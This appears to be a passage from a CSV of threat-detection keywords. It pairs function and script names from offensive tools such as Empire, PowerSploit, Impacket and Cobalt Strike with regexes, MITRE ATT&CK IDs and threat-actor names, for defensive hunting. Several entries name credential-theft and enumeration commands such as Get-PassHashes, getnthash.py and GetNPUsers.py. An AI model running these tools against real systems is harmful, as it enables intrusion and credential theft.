"*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetGPO -UserIdentity *",".{0,1000}Get\-NetGPO\s\-UserIdentity\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetGPOGroup*",".{0,1000}Get\-NetGPOGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetLocalGroup*",".{0,1000}Get\-NetLocalGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetLoggedon -*",".{0,1000}Get\-NetLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetRDPSession -*",".{0,1000}Get\-NetRDPSession\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*",".{0,1000}Get\-NetUser\s\-UACFilter\sNOT_ACCOUNTDISABLE.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getNimplantByGuid*",".{0,1000}getNimplantByGuid.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*GetNPUsers.py -request*",".{0,1000}GetNPUsers\.py\s\-request.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GetNPUsers.py*",".{0,1000}GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-NTDSdit*",".{0,1000}Get\-NTDSdit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getnthash.py -key *",".{0,1000}getnthash\.py\s\-key\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*",".{0,1000}getnthash\.py\s\-key\s\'8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getnthash.py*",".{0,1000}getnthash\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Get-NTLM.ps1*",".{0,1000}Get\-NTLM\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*GetNTLMChallengeBase64*",".{0,1000}GetNTLMChallengeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*getPac.py*",".{0,1000}getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-PacketNetBIOSSessionService*",".{0,1000}Get\-PacketNetBIOSSessionService.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketNTLMSSPAuth*",".{0,1000}Get\-PacketNTLMSSPAuth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketNTLMSSPNegotiate*",".{0,1000}Get\-PacketNTLMSSPNegotiate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketRPCBind*",".{0,1000}Get\-PacketRPCBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketRPCRequest*",".{0,1000}Get\-PacketRPCRequest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketSMB*",".{0,1000}Get\-PacketSMB.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PassHashes*",".{0,1000}Get\-PassHashes.{0,1000}","offensive_tool_keyword","nishang","Nishang is a 